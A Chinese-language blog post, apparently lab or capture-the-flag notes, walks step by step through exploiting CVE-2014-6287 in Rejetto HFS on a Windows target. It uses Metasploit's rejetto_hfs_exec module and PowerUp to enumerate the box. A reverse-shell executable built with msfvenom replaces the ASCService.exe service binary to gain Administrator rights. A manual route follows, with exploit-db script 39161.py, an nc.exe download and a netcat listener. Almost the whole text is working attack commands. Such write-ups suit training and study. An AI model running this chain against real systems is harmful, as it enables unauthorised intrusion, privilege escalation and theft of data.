windows漏洞CVE 2014-6287实例

CVE 2014-6287
OS:WINDOWS
msfconsole启动控制台
use exploit/windows/http/rejetto_hfs_exec
set rhost目标地址
set rport 目标端口8080
run
拿到meterpreter
dir
cd “c:/Users/bill/Desktop”
cat user.txt 拿到第一个答案
开启第二个kali shell下载提权脚本
下载 提权 脚本
git clone https://github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
cd Privesc
cp PowerUp.ps1 /root/
cd /root
ls
返回第一个msf控制台
cd “c:/Program Files (x86)\IObit”
meterpreter> upload /root/PowerUp.ps1
dir
load powershell
meterpreter>powershell_shell
ps> . .\PowerUp.ps1
ps> Invoke-Allchecks
发现AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
发现 ASCSservice.exe进程有权限

新建msf 会话
use exploit/multi/handler
set payload windows/shell/reverse_tcp (这步很重要经常忘记)
show options
set lhost 10.10.94.115 我的控制端主机地址
set lport 4443
run -j 或exploit -j
启动监听

新建msf
然后生成 后门木马 s
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.94.115 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
ls查看生成否
返回meterpreter命令 ctrl+z 输入 yes确认返回sessions -l
上传木马
meterpreter下转换插入木马的程序目录执行cd “c:/Program Files (x86)\IObit”
meterpreter> upload ASCService.exe
dir
确认ASCService.exe文件上传到c:/Program Files (x86)\IObit下

接下来 输入shell转换meterpreter为shell
sc stop AdvancedSystemCareService9
COPY ASCService.exe “Advanced SystemCare” 输入Yes确认 输入一致
sc start AdvancedSystemCareService9
另个监控的地方sessions -l 查看会话sessions -i 2
whoami
cd C:\Users\Administrator\Desktop
dir
type C:\Users\Administrator\Desktop\root.txt
下一步不使用metasploit进行访问和提权
我们将利用powershell和winpeas进行枚举收集信息
*请注意,您需要同时激活一个Web服务器和一个netcat侦听器,以使其正常工作!*
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe

exit
sessions -K 关闭所有会话
exit
searchsploit rejetto http file server
缺少最新的exploit 所以我们下载
cp /usr/share/exploitdb/exploits/windows/remote/39161.py elliot.py
ls
nano elliot.py
修改我的 ip 和port 9001 保存
下载netcat.exe
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
mv ncat.exe nc.exe
python -m SimpleHTTPServer 80
nc -lvnp 9001
python elliot.py 10.10.226.87 8080 目标ip

通过powershell获得服务命令

powershell -c “Get-Service”

未经允许不得转载:萌萌guo angline - Apprentissage » windows漏洞CVE 2014-6287实例

赞 (1) 打赏

评论 0

Protected with IP Blacklist CloudIP Blacklist Cloud

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏